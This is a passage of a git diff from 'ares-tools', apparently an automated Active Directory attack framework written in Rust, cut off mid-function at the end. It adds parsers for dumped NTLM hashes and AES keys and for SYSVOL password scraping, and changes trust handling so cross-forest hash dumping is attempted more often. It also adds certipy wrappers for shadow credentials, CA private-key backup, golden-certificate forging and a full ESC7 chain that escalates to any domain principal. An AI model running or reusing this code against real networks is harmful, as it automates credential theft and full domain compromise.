}; + buf = (buf << 6) | val; + bits += 6; + if bits >= 8 { + bits -= 8; + output.push((buf >> bits) as u8); + buf &= (1 << bits) - 1; + } + } + + Ok(output) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn parse_sid_wellknown() { + // S-1-5-18 (SYSTEM): revision=1, subauth_count=1, authority=5, subauth=18 + let bytes = [ + 0x01, // revision + 0x01, // sub authority count + 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // authority = 5 + 0x12, 0x00, 0x00, 0x00, // sub authority = 18 + ]; + let (sid, consumed) = parse_sid(&bytes, 0).unwrap(); + assert_eq!(sid, "S-1-5-18"); + assert_eq!(consumed, 12); + } + + #[test] + fn parse_sid_domain_user() { + // S-1-5-21-xxx-xxx-xxx-1001 + let bytes = [ + 0x01, // revision + 0x04, // sub authority count = 4 + 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, // authority = 5 + 0x15, 0x00, 0x00, 0x00, // 21 + 0x01, 0x00, 0x00, 0x00, // 1 + 0x02, 0x00, 0x00, 0x00, // 2 + 0xE9, 0x03, 0x00, 0x00, // 1001 + ]; + let (sid, _) = parse_sid(&bytes, 0).unwrap(); + assert_eq!(sid, "S-1-5-21-1-2-1001"); + } + + #[test] + fn parse_guid_format() { + // A known GUID: 00299570-246d-11d0-a768-00aa006e0529 + let bytes = [ + 0x70, 0x95, 0x29, 0x00, // d1 = 0x00299570 LE + 0x6d, 0x24, // d2 = 0x246d LE + 0xd0, 0x11, // d3 = 0x11d0 LE + 0xa7, 0x68, 0x00, 0xaa, 0x00, 0x6e, 0x05, 0x29, // d4 + ]; + let guid = parse_guid(&bytes, 0).unwrap(); + assert_eq!(guid, "00299570-246d-11d0-a768-00aa006e0529"); + } + + #[test] + fn base64_decode_simple() { + let decoded = base64_decode("AQAAAA==").unwrap(); + assert_eq!(decoded, vec![0x01, 0x00, 0x00, 0x00]); + } + + #[test] + fn base64_decode_empty() { + let decoded = base64_decode("").unwrap(); + assert!(decoded.is_empty()); + } + + #[test] + fn classify_generic_all() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: GENERIC_ALL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert_eq!(types, vec!["genericall"]); + } + + #[test] + fn classify_full_control() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: FULL_CONTROL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert_eq!(types, vec!["genericall"]); + } + + #[test] + fn classify_write_dacl() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: WRITE_DACL, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"writedacl")); + } + + #[test] + fn classify_write_owner() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: WRITE_OWNER, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"writeowner")); + } + + #[test] + fn classify_force_change_password() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: ADS_RIGHT_DS_CONTROL_ACCESS, + object_type_guid: Some(GUID_FORCE_CHANGE_PASSWORD.into()), + }; + let types = classify_ace(&ace); + assert!(types.contains(&"forcechangepassword")); + } + + #[test] + fn classify_self_membership() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: ADS_RIGHT_DS_SELF, + object_type_guid: Some(GUID_SELF_MEMBERSHIP.into()), + }; + let types = classify_ace(&ace); + assert!(types.contains(&"self_membership")); + } + + #[test] + fn classify_generic_write() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: GENERIC_WRITE, + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.contains(&"genericwrite")); + } + + #[test] + fn classify_no_dangerous_perms() { + let ace = ParsedAce { + trustee_sid: "S-1-5-21-1-2-1001".into(), + access_mask: 0x00000001, // just read + object_type_guid: None, + }; + let types = classify_ace(&ace); + assert!(types.is_empty()); + } + + #[test] + fn parse_security_descriptor_too_short() { + let result = parse_security_descriptor(&[0x01, 0x00]); + assert!(result.is_empty()); + } + + #[test] + fn well_known_sids() { + assert_eq!(well_known_sid("S-1-5-18"), Some("SYSTEM")); + assert_eq!(well_known_sid("S-1-1-0"), Some("Everyone")); + assert_eq!( + well_known_sid("S-1-5-32-544"), + Some("BUILTIN\\Administrators") + ); + assert_eq!(well_known_sid("S-1-5-21-custom"), None); + } + + #[test] + fn parse_acl_enumeration_empty() { + let vulns = parse_acl_enumeration("", &serde_json::json!({"domain": "contoso.local"})); + assert!(vulns.is_empty()); + } + + #[test] + fn parse_security_descriptor_minimal_valid() { + // Construct a minimal self-relative SD with DACL present, 0 ACEs + let mut sd = [0u8; 24]; + sd[0] = 1; // revision + // control: SE_DACL_PRESENT (0x0004) | SE_SELF_RELATIVE (0x8000) + sd[2] = 0x04; + sd[3] = 0x80; + // DACL offset at byte 16 (LE u32) + sd[16] = 20; // DACL starts at offset 20 + // DACL header at offset 20: revision=2, sbz=0, size=8, ace_count=0 + sd[20] = 2; // ACL revision + sd[22] = 8; // ACL size (just header) + sd[24..].iter().for_each(|_| {}); // pad isn't needed, we have exact size + + // Actually need 28 bytes total (20 for SD header + 8 for DACL header) + let mut sd = vec![0u8; 28]; + sd[0] = 1; + sd[2] = 0x04; + sd[3] = 0x80; + sd[16] = 20; + sd[20] = 2; + sd[22] = 8; + // ace_count at offset 24 = 0 + + let result = parse_security_descriptor(&sd); + assert!(result.is_empty()); + } +} diff --git a/ares-tools/src/parsers/secrets.rs b/ares-tools/src/parsers/secrets.rs index 4b5f2080..323db87a 100644 --- a/ares-tools/src/parsers/secrets.rs +++ b/ares-tools/src/parsers/secrets.rs @@ -2,6 +2,30 @@ use serde_json::{json, Value}; +/// Strip the `SMB ` framing that `nxc smb` prepends to every +/// line of pass-through output. If the line doesn't have the framing, return it +/// untouched. Needed because `forge_inter_realm_and_dump` shells out to +/// `nxc smb --ntds` instead of `impacket-secretsdump` (the latter's DRSUAPI +/// bind rejects cross-realm Kerberos credentials), so the secretsdump parser +/// has to handle nxc-framed lines too. +fn strip_nxc_framing(line: &str) -> &str { + let trimmed = line.trim_start(); + if !trimmed.starts_with("SMB ") && !trimmed.starts_with("SMB\t") { + return line; + } + // Walk through the first 4 whitespace-delimited tokens (SMB, IP, PORT, HOST) + // and return everything after the 4th token's trailing whitespace. + let mut rest = trimmed; + for _ in 0..4 { + rest = rest.trim_start(); + match rest.find(char::is_whitespace) { + Some(end) => rest = &rest[end..], + None => return line, + } + } + rest.trim_start() +} + pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec) { // Prefer target_domain (the domain being dumped) over domain (auth credential's domain) // to correctly attribute hashes when authenticating cross-domain. @@ -14,8 +38,34 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec" or + // "domain.local/user:aes256-cts-hmac-sha1-96:" + let mut aes_keys: std::collections::HashMap = std::collections::HashMap::new(); + for raw_line in output.lines() { + let line = strip_nxc_framing(raw_line).trim(); + if line.is_empty() || line.starts_with('[') { + continue; + } + if let Some(rest) = line.split_once(":aes256-cts-hmac-sha1-96:") { + let raw_user = rest.0; + let aes_hex = rest.1.trim(); + if aes_hex.is_empty() || !aes_hex.chars().all(|c| c.is_ascii_hexdigit()) { + continue; + } + let username = raw_user + .rsplit_once(['\\', '/']) + .map(|(_, u)| u) + .unwrap_or(raw_user) + .to_string(); + aes_keys.insert(username.to_lowercase(), aes_hex.to_lowercase()); + } + } + + for raw_line in output.lines() { + let line = strip_nxc_framing(raw_line).trim(); // NTLM hash format: "username:RID:LMhash:NThash:::" // or "DOMAIN\username:RID:LMhash:NThash:::" @@ -23,13 +73,14 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec = line.split(':').collect(); if parts.len() >= 4 { let raw_user = parts[0]; - let (user_domain, username) = if raw_user.contains('\\') { - let split: Vec<&str> = raw_user.splitn(2, '\\').collect(); - let netbios = split[0]; - // Resolve NetBIOS domain prefix to FQDN using target_domain. - // e.g. "CONTOSO" → "contoso.local" when target_domain="contoso.local" - let resolved = resolve_netbios_to_fqdn(netbios, domain); - (resolved, split[1].to_string()) + let (user_domain, username) = if let Some(idx) = raw_user.find(['\\', '/']) { + let prefix = &raw_user[..idx]; + let user = &raw_user[idx + 1..]; + // Resolve NetBIOS prefix to FQDN using target_domain. + // raiseChild emits "domain.local/user" (slash + FQDN), + // standard secretsdump emits "DOMAIN\\user" (backslash + NetBIOS). + let resolved = resolve_netbios_to_fqdn(prefix, domain); + (resolved, user.to_string()) } else { (domain.to_string(), raw_user.to_string()) }; @@ -40,13 +91,17 @@ pub fn parse_secretsdump(output: &str, params: &Value) -> (Vec, Vec " prefix. + let output = "\ +SMB 192.168.58.10 445 DC01 [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) +SMB 192.168.58.10 445 DC01 contoso.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: +SMB 192.168.58.10 445 DC01 contoso.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222::: +SMB 192.168.58.10 445 DC01 [+] Dumped 2 NTDS hashes"; + let params = json!({"target_domain": "contoso.local"}); + let (hashes, _) = parse_secretsdump(output, ¶ms); + assert_eq!(hashes.len(), 2); + assert_eq!(hashes[0]["username"], "krbtgt"); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert!(hashes[0]["hash_value"] + .as_str() + .unwrap() + .contains("11111111111111111111111111111111")); + assert_eq!(hashes[1]["username"], "Administrator"); + } + + #[test] + fn parse_secretsdump_strips_nxc_framing_with_aes_keys() { + // nxc-framed output should still let AES-key collection work. + let output = "\ +SMB 192.168.58.20 445 DC02 FABRIKAM\\CONTOSO$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333::: +SMB 192.168.58.20 445 DC02 FABRIKAM\\CONTOSO$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444"; + let params = json!({"target_domain": "fabrikam.local"}); + let (hashes, _) = parse_secretsdump(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "CONTOSO$"); + assert_eq!( + hashes[0]["aes_key"], + "4444444444444444444444444444444444444444444444444444444444444444" + ); + } } diff --git a/ares-tools/src/parsers/spider.rs b/ares-tools/src/parsers/spider.rs index cdca3af4..e7232160 100644 --- a/ares-tools/src/parsers/spider.rs +++ b/ares-tools/src/parsers/spider.rs @@ -106,7 +106,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { .unwrap_or(domain); let username = &cap[2]; let password = &cap[3]; - if is_plausible_password(password) { + if is_plausible_password(password) && is_plausible_username(username) { creds.push(json!({ "username": username, "password": password, @@ -120,6 +120,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { let usernames: Vec = RE_USERNAME .captures_iter(content) .filter_map(|cap| first_capture(&cap, &[1, 2, 3])) + .filter(|u| is_plausible_username(u)) .collect(); let passwords: Vec = RE_PASSWORD @@ -157,6 +158,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { let ps_users: Vec = RE_PS_PARAM_USER .captures_iter(content) .filter_map(|cap| first_capture(&cap, &[1, 2, 3])) + .filter(|u| is_plausible_username(u)) .collect(); let ps_passes: Vec = RE_PS_PARAM_PASS @@ -201,7 +203,7 @@ pub fn parse_spider_credentials(output: &str, params: &Value) -> Vec { } /// Quick check that a value looks like a plausible password (not a variable ref, -/// not too short, not a common placeholder). +/// not a PowerShell cmdlet, not too short, not a common placeholder). fn is_plausible_password(s: &str) -> bool { if s.len() < 2 { return false; @@ -210,6 +212,11 @@ fn is_plausible_password(s: &str) -> bool { if s.starts_with('$') || s.starts_with('%') { return false; } + // Skip PowerShell cmdlets (Verb-Noun) like `New-Object`, `Get-Credential`. + // Captured when scripts assign cmdlet output to $password without quotes. + if PS_CMDLET_RE.is_match(s) { + return false; + } // Skip common placeholders let lower = s.to_lowercase(); !matches!( @@ -218,6 +225,30 @@ fn is_plausible_password(s: &str) -> bool { ) } +/// Quick check that a value looks like a plausible username (not a variable +/// reference, property access, or scriptblock fragment). +fn is_plausible_username(s: &str) -> bool { + if s.len() < 2 { + return false; + } + // PowerShell variable / property access: `$x`, `$x.y`, `$env:X` + if s.starts_with('$') || s.starts_with('%') { + return false; + } + // Reject anything containing characters that don't appear in real + // usernames but DO appear in scriptblock fragments / expressions. + if s.chars() + .any(|c| matches!(c, '(' | ')' | '{' | '}' | '"' | '\'' | ';' | ' ')) + { + return false; + } + true +} + +/// PowerShell cmdlet shape: `Verb-Noun` with TitleCase verb and noun. +static PS_CMDLET_RE: LazyLock = + LazyLock::new(|| Regex::new(r"^[A-Z][a-zA-Z]+-[A-Z][a-zA-Z]+$").unwrap()); + #[cfg(test)] mod tests { use super::*; @@ -314,6 +345,29 @@ $pass = "P@ssw0rd" assert!(creds.is_empty()); } + #[test] + fn rejects_powershell_expression_username_and_cmdlet_password() { + // Real-world false positive that produced + // `contoso.local\$user.username:New-Object` in loot. The username is a + // PowerShell property access expression, the "password" is a cmdlet + // name (Verb-Noun). Neither is a literal credential. + let output = r#" +--- SYSVOL/scripts/userInfo.ps1 --- +$user = $User.UserName +$password = New-Object PSCredential +"#; + let params = json!({"domain": "contoso.local"}); + let creds = parse_spider_credentials(output, ¶ms); + assert!( + creds.is_empty(), + "expected zero creds, got {:?}", + creds + .iter() + .map(|c| format!("{}:{}", c["username"], c["password"])) + .collect::>() + ); + } + // ── split_domain_user ───────────────────────────────────────── #[test] diff --git a/ares-tools/src/parsers/trust.rs b/ares-tools/src/parsers/trust.rs index 8eb523b0..74aa069a 100644 --- a/ares-tools/src/parsers/trust.rs +++ b/ares-tools/src/parsers/trust.rs @@ -11,8 +11,10 @@ const TRUST_DIRECTION_BIDIRECTIONAL: u32 = 3; const TRUST_TYPE_PARENT_CHILD: u32 = 1; // same forest const TRUST_TYPE_TREE_ROOT: u32 = 2; // tree root (also intra-forest) -/// LDAP trustAttributes (MS-ADTS 6.1.6.7.9) flag for forest transitive trust. +/// LDAP trustAttributes (MS-ADTS 6.1.6.7.9) flags. const TRUST_ATTR_FOREST_TRANSITIVE: u32 = 0x00000008; +const TRUST_ATTR_WITHIN_FOREST: u32 = 0x00000020; +const TRUST_ATTR_QUARANTINED_DOMAIN: u32 = 0x00000004; /// Parse `enumerate_domain_trusts` ldapsearch output into TrustInfo-compatible JSON values. /// @@ -46,8 +48,19 @@ pub fn parse_domain_trusts(output: &str) -> Vec { let classified_type = classify_trust_type(trust_type, trust_attributes, cn); - let sid_filtering = - trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 || classified_type == "forest"; + // Modern AD defaults to SID filtering on cross-forest/external trusts, + // but `netdom trust /SidFiltering /Disable` is a common lab and + // production reconfiguration with no corresponding LDAP attribute. The + // only authoritative LDAP-visible signal that filtering is *on* is the + // QUARANTINED_DOMAIN bit, which AD sets when a trust has been + // explicitly quarantined. Inferring filtering from FOREST_TRANSITIVE + // alone (or from classified_type) is a false-positive that + // permanently suppresses `forge_inter_realm_and_dump` against any + // misconfigured cross-forest trust — losing the entire foreign forest + // (the op-20260502-185055 fabrikam regression). The forge's + // dedup-on-empty-output path already handles the false-negative case + // (~30s doomed DCSync, then dedup locks and fallbacks fire). + let sid_filtering = trust_attributes & TRUST_ATTR_QUARANTINED_DOMAIN != 0; Some(json!({ "domain": cn.to_lowercase(), @@ -111,12 +124,27 @@ pub fn parse_domain_trusts(output: &str) -> Vec { } /// Classify trust type from LDAP trustType and trustAttributes values. +/// +/// trustAttributes is the authoritative signal: +/// - WITHIN_FOREST (0x20) → intra-forest (parent_child or tree_root) +/// - FOREST_TRANSITIVE (0x08) → cross-forest +/// - QUARANTINED_DOMAIN (0x04) → external (with SID filtering) +/// +/// trustType is largely informational in modern AD (almost always 2 = uplevel). +/// Fall back to cn-label heuristics only when attributes are missing. fn classify_trust_type(trust_type: u32, trust_attributes: u32, cn: &str) -> String { - // Forest transitive flag → cross-forest trust + // Authoritative attribute checks first. + if trust_attributes & TRUST_ATTR_WITHIN_FOREST != 0 { + return "parent_child".to_string(); + } if trust_attributes & TRUST_ATTR_FOREST_TRANSITIVE != 0 { return "forest".to_string(); } + if trust_attributes & TRUST_ATTR_QUARANTINED_DOMAIN != 0 { + return "external".to_string(); + } + // Fall back to legacy trustType-based heuristics. match trust_type { TRUST_TYPE_PARENT_CHILD => "parent_child".to_string(), TRUST_TYPE_TREE_ROOT => { @@ -150,7 +178,9 @@ flatName: FABRIKAM assert_eq!(trusts[0]["flat_name"], "FABRIKAM"); assert_eq!(trusts[0]["direction"], "bidirectional"); assert_eq!(trusts[0]["trust_type"], "forest"); - assert!(trusts[0]["sid_filtering"].as_bool().unwrap()); + // FOREST_TRANSITIVE (0x08) alone does NOT imply SID filtering — only + // QUARANTINED_DOMAIN (0x04) is authoritative. See parse_domain_trusts. + assert!(!trusts[0]["sid_filtering"].as_bool().unwrap()); } #[test] @@ -221,6 +251,10 @@ flatName: CHILD assert_eq!(trusts.len(), 1); assert_eq!(trusts[0]["direction"], "outbound"); assert_eq!(trusts[0]["trust_type"], "external"); + // Without QUARANTINED_DOMAIN we don't infer SID filtering — labs and + // misconfigured prod often have it disabled and there's no other + // LDAP-visible signal. The forge will attempt and dedup-on-empty if + // filtering is actually on. assert!(!trusts[0]["sid_filtering"].as_bool().unwrap()); } @@ -250,6 +284,30 @@ flatName: CHILD assert_eq!(trusts[0]["trust_type"], "parent_child"); } + #[test] + fn parse_trust_within_forest_from_child_view() { + // When enumerating from child looking up to parent, cn is short + // ("contoso.local") but trustAttributes has WITHIN_FOREST (0x20). + // The attribute is authoritative and should yield parent_child. + let output = + "cn: contoso.local\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 32\nflatName: CONTOSO\n"; + let trusts = parse_domain_trusts(output); + assert_eq!(trusts.len(), 1); + assert_eq!(trusts[0]["trust_type"], "parent_child"); + assert!(!trusts[0]["sid_filtering"].as_bool().unwrap()); + } + + #[test] + fn parse_trust_quarantined_external() { + // QUARANTINED_DOMAIN (0x04) → external trust with SID filtering. + let output = + "cn: partner.com\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 4\nflatName: PARTNER\n"; + let trusts = parse_domain_trusts(output); + assert_eq!(trusts.len(), 1); + assert_eq!(trusts[0]["trust_type"], "external"); + assert!(trusts[0]["sid_filtering"].as_bool().unwrap()); + } + #[test] fn parse_trust_domain_lowercased() { let output = "cn: FABRIKAM.LOCAL\ntrustDirection: 3\ntrustType: 2\ntrustAttributes: 8\nflatName: FABRIKAM\n"; diff --git a/ares-tools/src/privesc/adcs.rs b/ares-tools/src/privesc/adcs.rs index 9e7c358e..2b98c2b8 100644 --- a/ares-tools/src/privesc/adcs.rs +++ b/ares-tools/src/privesc/adcs.rs @@ -9,33 +9,41 @@ use crate::ToolOutput; /// Enumerate ADCS certificate templates and CAs using Certipy. /// -/// Required args: `username`, `domain`, `password`, `dc_ip` -/// Optional args: `vulnerable` +/// Required args: `username`, `domain`, `dc_ip` +/// Optional args: `password`, `hashes`, `vulnerable` pub async fn certipy_find(args: &Value) -> Result { let username = required_str(args, "username")?; let domain = required_str(args, "domain")?; - let password = required_str(args, "password")?; let dc_ip = required_str(args, "dc_ip")?; - let vulnerable = optional_bool(args, "vulnerable").unwrap_or(false); + let vulnerable = optional_bool(args, "vulnerable").unwrap_or(true); + let hashes = optional_str(args, "hashes"); let user_at_domain = format!("{username}@{domain}"); - CommandBuilder::new("certipy") + let mut cmd = CommandBuilder::new("certipy") .arg("find") - .flag("-u", user_at_domain) - .flag("-p", password) + .flag("-u", &user_at_domain) .flag("-dc-ip", dc_ip) .arg("-text") + .arg("-stdout") .arg_if(vulnerable, "-vulnerable") - .timeout_secs(120) - .execute() - .await + .timeout_secs(120); + + if let Some(h) = hashes { + cmd = cmd.flag("-hashes", h); + } else { + let password = required_str(args, "password")?; + cmd = cmd.flag("-p", password); + } + + cmd.execute().await } /// Request a certificate from an ADCS CA using Certipy. /// /// Required args: `username`, `domain`, `password`, `ca`, `template`, `dc_ip` -/// Optional args: `upn` +/// Optional args: `upn`, `target` (CA server IP/hostname — use when CA is not on the DC), +/// `sid` (SID to embed in cert), `out` (output PFX filename) pub async fn certipy_request(args: &Value) -> Result { let username = required_str(args, "username")?; let domain = required_str(args, "domain")?; @@ -44,6 +52,24 @@ pub async fn certipy_request(args: &Value) -> Result { let template = required_str(args, "template")?; let dc_ip = required_str(args, "dc_ip")?; let upn = optional_str(args, "upn"); + let sid = optional_str(args, "sid"); + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + let application_policies = optional_str(args, "application_policies"); + + // Generate a unique output filename to avoid certipy's interactive overwrite + // prompt which kills non-interactive runs. Use template + epoch millis. + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + format!("cert_{template}_{ts}") + } + }; let user_at_domain = format!("{username}@{domain}"); @@ -54,7 +80,11 @@ pub async fn certipy_request(args: &Value) -> Result { .flag("-ca", ca) .flag("-template", template) .flag("-dc-ip", dc_ip) + .flag("-out", out) + .flag_opt("-target", target) .flag_opt("-upn", upn) + .flag_opt("-sid", sid) + .flag_opt("-application-policies", application_policies) .timeout_secs(120) .execute() .await @@ -68,6 +98,15 @@ pub async fn certipy_auth(args: &Value) -> Result { let dc_ip = required_str(args, "dc_ip")?; let domain = required_str(args, "domain")?; + // Certipy auth writes .ccache based on cert subject (e.g. administrator.ccache) + // and does NOT support -out. Remove existing .ccache files to prevent the + // interactive "Overwrite? (y/n)" prompt that kills non-interactive runs. + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + CommandBuilder::new("certipy") .arg("auth") .flag("-pfx", pfx_path) @@ -80,25 +119,392 @@ pub async fn certipy_auth(args: &Value) -> Result { /// Perform Certipy Shadow Credentials attack (auto mode). /// -/// Required args: `username`, `domain`, `password`, `target`, `dc_ip` +/// Required args: `username`, `domain`, `target`, `dc_ip` +/// Required (one of): `password`, `hashes` pub async fn certipy_shadow(args: &Value) -> Result { let username = required_str(args, "username")?; let domain = required_str(args, "domain")?; - let password = required_str(args, "password")?; let target = required_str(args, "target")?; let dc_ip = required_str(args, "dc_ip")?; + let hashes = optional_str(args, "hashes"); let user_at_domain = format!("{username}@{domain}"); - CommandBuilder::new("certipy") + // Generate unique output name to avoid interactive overwrite prompt + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + format!("shadow_{target}_{ts}") + } + }; + + // certipy shadow auto internally calls certipy auth which writes .ccache + // based on the target account name. Remove existing .ccache to prevent the + // interactive "Overwrite? (y/n)" prompt. + let _ = tokio::process::Command::new("sh") + .arg("-c") + .arg("rm -f *.ccache 2>/dev/null") + .output() + .await; + + let mut cmd = CommandBuilder::new("certipy") .arg("shadow") .arg("auto") .flag("-username", user_at_domain) - .flag("-password", password) .flag("-account", target) .flag("-dc-ip", dc_ip) + .flag("-out", out) + .timeout_secs(120); + + if let Some(h) = hashes { + cmd = cmd.flag("-hashes", h); + } else { + let password = required_str(args, "password")?; + cmd = cmd.flag("-password", password); + } + + cmd.execute().await +} + +/// Certipy CA management operations (add-officer, issue-request, backup). +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca` +/// Required: exactly one of: +/// - `add_officer` (bool, true) +/// - `issue_request` (integer request ID) +/// - `backup` (bool, true) — exports the CA private key to `.pfx` in CWD. +/// Requires SYSTEM-equivalent access on the CA host (e.g., the calling +/// process is running on a host where `username` is local administrator). +pub async fn certipy_ca(args: &Value) -> Result { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + + let user_at_domain = format!("{username}@{domain}"); + + let add_officer = optional_bool(args, "add_officer").unwrap_or(false); + let backup = optional_bool(args, "backup").unwrap_or(false); + let issue_request = args + .get("issue_request") + .and_then(|v| v.as_i64()) + .map(|v| v as i32); + + let mut cmd = CommandBuilder::new("certipy") + .arg("ca") + .flag("-username", user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .timeout_secs(180); + + if add_officer { + cmd = cmd.flag("-add-officer", format!("{username}@{domain}")); + } + if let Some(req_id) = issue_request { + cmd = cmd.flag("-issue-request", req_id.to_string()); + } + if backup { + cmd = cmd.arg("-backup"); + } + + cmd.execute().await +} + +/// Forge a "Golden Certificate" from a stolen CA PFX (the `-backup` output of +/// `certipy_ca`). Produces a client PFX that authenticates as `upn` on the CA's +/// domain — the universal terminal node for ADCS compromise: any path that +/// gets SYSTEM on a CA host can chain `certipy_ca backup` → this tool → +/// `certipy_auth` to obtain a TGT/NT hash for any principal in the domain. +/// +/// Required args: `ca_pfx` (path to stolen CA PFX), `upn` (target principal, +/// e.g. `administrator@fabrikam.local`) +/// Optional args: `subject`, `template`, `out` (output PFX path) +pub async fn certipy_forge(args: &Value) -> Result { + let ca_pfx = required_str(args, "ca_pfx")?; + let upn = required_str(args, "upn")?; + let subject = optional_str(args, "subject"); + let template = optional_str(args, "template"); + + let out = match optional_str(args, "out") { + Some(o) => o.to_string(), + None => { + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let safe_upn = upn.replace(['/', '\\', ' '], "_"); + format!("forged_{safe_upn}_{ts}.pfx") + } + }; + + CommandBuilder::new("certipy") + .arg("forge") + .flag("-ca-pfx", ca_pfx) + .flag("-upn", upn) + .flag_opt("-subject", subject) + .flag_opt("-template", template) + .flag("-out", out) + .timeout_secs(60) + .execute() + .await +} + +/// Retrieve a previously issued certificate by request ID. +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca`, +/// `request_id` +/// Optional args: `target` (CA server IP) +pub async fn certipy_retrieve(args: &Value) -> Result { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + let request_id = + args.get("request_id") + .and_then(|v| v.as_i64()) + .ok_or_else(|| anyhow::anyhow!("missing required arg: request_id"))? as i32; + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + + let user_at_domain = format!("{username}@{domain}"); + + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out = format!("cert_retrieve_{request_id}_{ts}"); + + CommandBuilder::new("certipy") + .arg("req") + .flag("-username", user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-retrieve", request_id.to_string()) + .flag("-dc-ip", dc_ip) + .flag("-out", out) + .flag_opt("-target", target) + .timeout_secs(120) + .execute() + .await +} + +/// Run the full ESC7 exploitation chain: add officer → request SubCA cert +/// (gets denied) → issue the pending request → retrieve cert → authenticate. +/// +/// Required args: `username`, `domain`, `password`, `dc_ip`, `ca` +/// Optional args: `target` (CA server IP), `upn`, `sid` +pub async fn certipy_esc7_full_chain(args: &Value) -> Result { + let username = required_str(args, "username")?; + let domain = required_str(args, "domain")?; + let password = required_str(args, "password")?; + let dc_ip = required_str(args, "dc_ip")?; + let ca = required_str(args, "ca")?; + let upn = optional_str(args, "upn") + .unwrap_or("administrator") + .to_string(); + let target = optional_str(args, "target") + .or_else(|| optional_str(args, "ca_host")) + .or_else(|| optional_str(args, "target_ip")); + let sid = optional_str(args, "sid"); + + let upn_full = if upn.contains('@') { + upn.clone() + } else { + format!("{upn}@{domain}") + }; + + let user_at_domain = format!("{username}@{domain}"); + let mut outputs = Vec::new(); + + // Step 1: Add self as CA officer (certipy v5 requires principal as arg) + let mut step1_cmd = CommandBuilder::new("certipy") + .arg("ca") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-dc-ip", dc_ip) + .flag("-ca", ca) + .flag("-add-officer", username); + if let Some(t) = &target { + step1_cmd = step1_cmd.flag("-target", *t); + } + let step1 = step1_cmd.timeout_secs(120).execute().await?; + outputs.push(("Add Officer", step1)); + + // Step 2: Request cert with SubCA template (will be denied/pending) + let ts = std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| d.as_millis()) + .unwrap_or(0); + let out_name = format!("cert_esc7_{ts}"); + + let mut req_cmd = CommandBuilder::new("certipy") + .arg("req") + .flag("-username", &user_at_domain) + .flag("-password", password) + .flag("-ca", ca) + .flag("-template", "SubCA") + .flag("-upn", &upn_full) + .flag("-dc-ip", dc_ip) + .flag("-out", &out_name); + if let Some(t) = &target { + req_cmd = req_cmd.flag("-target", *t); + } + if let Some(s) = &sid { + req_cmd = req_cmd.flag("-sid", *s); + } + // Certipy asks "Would you like to save the private key? (y/N)" when the + // SubCA request is denied — we need to answer "y" to keep the key for later. + let step2 = req_cmd.stdin("y\n").timeout_secs(120).execute().await?; + + // Parse the request ID from certipy output (e.g., "Request ID is 42") + let request_id = step2 + .stdout + .lines() + .chain(step2.stderr.lines()) + .find_map(|line| { + let lower = line.to_lowercase(); + if lower.contains("request id") { + line.split_whitespace() + .filter_map(|w| w.trim_end_matches('.').parse::().ok()) + .next_back() + } else { + None + } + }); + 